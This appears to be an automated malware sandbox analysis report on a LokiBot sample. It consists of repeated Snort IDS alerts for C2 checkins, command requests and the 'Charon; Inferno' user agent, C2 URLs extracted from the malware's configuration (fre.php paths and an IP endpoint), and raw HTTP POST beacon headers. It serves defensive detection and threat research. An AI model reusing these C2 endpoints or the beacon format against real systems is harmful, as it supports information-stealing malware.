Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49753 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49753 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49753 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49753 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49754 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49754 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49754 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49754 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49755 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49755 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49755 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49755 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49756 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49756 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49756 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49756 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49757 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49757 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49757 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49757 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49758 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49758 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49758 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49758 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49759 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49759 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49759 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49759 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49760 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49760 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49760 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49760 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49761 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49761 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49761 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49761 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49762 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49762 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49762 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49762 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49764 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49764 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49764 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49764 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49765 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49765 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49765 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49765 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49766 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49766 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49766 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49766 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49767 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49767 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49767 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49767 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49768 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49768 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49768 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49768 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49769 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49769 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49769 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49769 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49770 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49770 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49770 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49770 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49771 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49771 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49771 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49771 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49772 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49772 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49772 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49772 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49773 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49773 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49773 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49773 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49774 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49774 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49774 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49774 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49775 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49775 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49775 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49775 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49776 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49776 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49776 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49776 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49777 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49777 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49777 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49777 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49778 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49778 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49778 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49778 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49779 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49779 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49779 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49779 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49780 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49780 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49780 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49780 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49781 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49781 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49781 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49781 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49782 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49782 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49782 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49782 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49783 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49783 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49783 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49783 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49784 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49784 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49784 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49784 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49785 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49785 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49785 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49785 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49786 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49786 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49786 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49786 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49787 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49787 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49787 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49787 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49788 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49788 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49788 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49788 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49789 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49789 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49789 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49789 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49790 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49790 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49790 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49790 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49791 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49791 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49791 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49791 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49792 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49792 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49792 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49792 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49793 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49793 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49793 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49793 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49794 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49794 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49794 -> 136.244.109.75:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49794 -> 136.244.109.75:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: http://136.244.109.75/index.php/1748937

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-CHOOPAUS AS-CHOOPAUS

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 180Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 180Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/1748937 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 136.244.109.75Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 412D3974Content-Length: 153Connection: close
